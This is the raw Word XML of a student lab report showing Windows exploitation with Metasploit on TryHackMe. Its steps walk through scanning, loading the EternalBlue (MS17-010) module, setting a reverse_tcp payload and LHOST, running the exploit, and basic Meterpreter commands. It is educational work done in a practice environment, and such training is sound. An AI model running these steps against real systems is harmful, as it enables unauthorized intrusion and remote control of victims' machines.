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DDEFB" w14:textId="39275346" w:rsidR="001A3075" w:rsidRPr="00172C4E" w:rsidRDefault="002F7AAB" w:rsidP="001A307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2C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A90B94" w:rsidRPr="00172C4E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p w14:paraId="47002C15" w14:textId="77777777" w:rsidR="001A3075" w:rsidRPr="00172C4E" w:rsidRDefault="001A3075" w:rsidP="00172C4E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00172C4E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstration of Various Windows OS Exploits Using Metasploit Framework on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00172C4E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00172C4E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA806DB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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB775A0" w14:textId="4DF86563" w:rsidR="001A3075" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="001A3075">
        <w:t xml:space="preserve">To understand and demonstrate exploitation of Windows operating system vulnerabilities using the Metasploit Framework through hands-on exercises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</w:p>
    <w:p w14:paraId="0B284382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Tools / Platform Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2978A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Web Browser (Chrome / Firefox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C3D49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Internet Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77DD2E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Account (Already Created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306D0860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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3075">
        <w:t xml:space="preserve"> (Built-in Linux Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3C2060" w14:textId="428EBC2C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 xml:space="preserve">Metasploit Framework (Pre-installed in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB2FB95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Theory (Brief)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167903FE" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="001A3075" w:rsidP="00B32910">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A3075">
        <w:t>Metasploit Framework is a powerful penetration testing tool used to develop, test, and execute exploits against vulnerable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DE861" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="001A3075" w:rsidP="00B32910">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001A3075">
        <w:t>Windows operating systems often contain vulnerabilities due to misconfigurations, outdated services, or unpatched software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F153E75" w14:textId="3F50C337" w:rsidR="001A3075" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="00B32910">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3075">
        <w:t xml:space="preserve"> provides a safe and legal environment to practice Windows exploitation using Metasploit without impacting real-world systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D09E079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Steps to Perform the Experiment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF57737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9EB8386" w14:textId="77777777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 xml:space="preserve">Open browser and go to: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001A3075">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F375A8F" w14:textId="244BA03A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>Login using your registered credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999F763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2: Open Metasploit Windows Exploitation Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B49031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In the search bar, type </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Windows Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C91F9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Select the appropriate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4AE96CF" w14:textId="6A45B82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Click </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Join Room</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC3002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1A3075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722A8807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Click </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1636F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>Wait for the Linux environment to load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51AD19" w14:textId="4CBADF4A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Open the terminal inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A3075">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC872A" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="00B32910" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09526C6A" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="00B32910" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246A5C7E" w14:textId="460A0444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lastRenderedPageBreak/>
        <w:t>Step 4: Launch Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B2165" w14:textId="77777777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Start Metasploit console:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BECEE70" w14:textId="77777777" w:rsidR="001A3075" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="001A3075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1AE0A8FD" w14:textId="0692431F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Wait for Metasploit to initialize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFBD10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5: Scan the Target System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C4EFC5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 xml:space="preserve">Identify the target IP address provided by the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B2F340F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>Perform basic scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF0221" w14:textId="509E0994" w:rsidR="001A3075" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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nmap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 xml:space="preserve">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1C15C18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6: Select Windows Exploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6CFBA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Search for Windows exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BBF3A" w14:textId="77777777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search windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4033F7CD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Select a suitable exploit module (example: SMB vulnerability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64F761" w14:textId="2C7F975E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use exploit/windows/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smb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/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7343EA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7: Configure Exploit Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640155A0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target IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223ED15D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RHOSTS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EF2A863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payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32C25F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PAYLOAD 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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C577946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Configure local host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0495EF38" w14:textId="132B966A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LHOST &lt;your-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706DEE9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8: Execute the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA24086" w14:textId="77777777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Run the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44923124" w14:textId="77777777" w:rsidR="001A3075" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="001A30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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACEBE78" w14:textId="39629450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Gain Meterpreter session upon successful exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E034B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9: Post-Exploitation Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F813E45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Verify access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3EB7BA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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D1B5289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Check privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C39FDE6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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="134EA50F" w14:textId="77B647D0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Perform basic enumeration as guided by the room tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1ED9F6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10: Complete the Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C7DF7" w14:textId="77777777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>Capture required flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A2C43" w14:textId="2C31F3C4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 xml:space="preserve">Ensure all tasks are marked </w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Completed</w:t>
      </w:r>
      <w:r w:rsidRPr="001A3075">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B6D78" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="00B32910" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486BF408" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="00B32910" w:rsidP="001A3075">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D32E08" w14:textId="3231AC65" w:rsidR="00AB1CD6" w:rsidRPr="00172C4E" w:rsidRDefault="001A3075" w:rsidP="00172C4E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/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lastRenderedPageBreak/>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8823A" w14:textId="0A57E4FC" w:rsidR="00B32910" w:rsidRDefault="00AB1CD6" w:rsidP="00B32910">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1CD6">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579C0CFF" wp14:editId="1332832B">
            <wp:extent cx="5745844" cy="25450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53" cy="25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BD49" w14:textId="77777777" w:rsidR="00B32910" w:rsidRDefault="00654170" w:rsidP="00B32910">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654170">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C5D0C38" wp14:editId="3478731E">
            <wp:extent cx="5732145" cy="420624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-624"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732145" cy="420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38452" w14:textId="37BB8659" w:rsidR="003D78D3" w:rsidRDefault="009F517F" w:rsidP="003D78D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F517F">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3978755C" wp14:editId="33575097">
            <wp:extent cx="5708792" cy="27127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10" cy="27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E7D7" w14:textId="77777777" w:rsidR="00F9748F" w:rsidRDefault="00F9748F" w:rsidP="003D78D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1448FC1E" w14:textId="6E78FA95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Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EB792" w14:textId="02994FCA" w:rsidR="004506B7" w:rsidRPr="001A3075" w:rsidRDefault="001A3075" w:rsidP="00AB1CD6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="001A3075">
        <w:t xml:space="preserve">Thus, various Windows operating system exploits were successfully demonstrated using the Metasploit Framework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  <w:r w:rsidRPr="001A3075">
        <w:br/>
        <w:t>The experiment enhanced understanding of Windows vulnerabilities, exploitation techniques, and post-exploitation concepts.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="004506B7" w:rsidRPr="001A3075" w:rsidSect="00172C4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A67D7" w14:textId="77777777" w:rsidR="00AA161C" w:rsidRDefault="00AA161C" w:rsidP="00172C4E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="351EE680" w14:textId="77777777" w:rsidR="00AA161C" w:rsidRDefault="00AA161C" w:rsidP="00172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5A7B3" w14:textId="77777777" w:rsidR="00AA161C" w:rsidRDefault="00AA161C" w:rsidP="00172C4E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5425D9C8" w14:textId="77777777" w:rsidR="00AA161C" w:rsidRDefault="00AA161C" w:rsidP="00172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107B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD668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1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="1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72C4E"/>
    <w:rsid w:val="001A3075"/>
    <w:rsid w:val="002F7AAB"/>
    <w:rsid w:val="003015D7"/>
    <w:rsid w:val="003018C9"/>
    <w:rsid w:val="00356932"/>
    <w:rsid w:val="003D78D3"/>
    <w:rsid w:val="004506B7"/>
    <w:rsid w:val="00490D46"/>
    <w:rsid w:val="004C79F7"/>
    <w:rsid w:val="00654170"/>
    <w:rsid w:val="006947CB"/>
    <w:rsid w:val="00914640"/>
    <w:rsid w:val="009F517F"/>
    <w:rsid w:val="00A90B94"/>
    <w:rsid w:val="00AA0025"/>
    <w:rsid w:val="00AA161C"/>
    <w:rsid w:val="00AB1CD6"/>
    <w:rsid w:val="00B32910"/>
    <w:rsid w:val="00C276DD"/>
    <w:rsid w:val="00E9668B"/>
    <w:rsid w:val="00F108D2"/>
    <w:rsid w:val="00F9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2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C4E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00172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ryhackm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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-09T05:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-01T04:41:00Z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